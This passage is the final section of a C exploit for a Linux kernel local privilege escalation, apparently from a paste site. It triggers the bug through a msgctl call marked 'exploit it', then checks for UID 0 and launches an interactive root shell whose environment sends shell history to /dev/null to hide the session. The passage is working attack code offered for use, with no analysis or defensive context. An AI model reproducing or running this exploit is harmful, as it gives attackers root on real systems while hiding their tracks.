  899.     msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
  900.   }
  901.  
  902.   munmap((void*)Y0Y0CMAP, PAGE_SIZE);
  903.  
  904.   /* exec */
  905.   if(getuid() == 0)
  906.   {
  907.     pid_t pid;
  908.     __fprint_string("$$$ UID 0\n");
  909.     pid = fork();
  910.     if(pid == 0)
  911.     {
  912.       char *args[] = {"/bin/sh", "-i", NULL};
  913.       char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
  914.                       "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
  915.       execve("/bin/sh", args, envp);
  916.     }
  917.     else  
  918.     {
  919.       int status;
  920.       waitpid(pid, &status, 0);
  921.     }
  922.   }
  923.   else
  924.     __fprint_string("!!! UID not 0, failed\n");
  925.  
  926.   close(s);
  927.   return 0;
  928. }
  929.  
  930. #endif // -m32
RAW Paste Data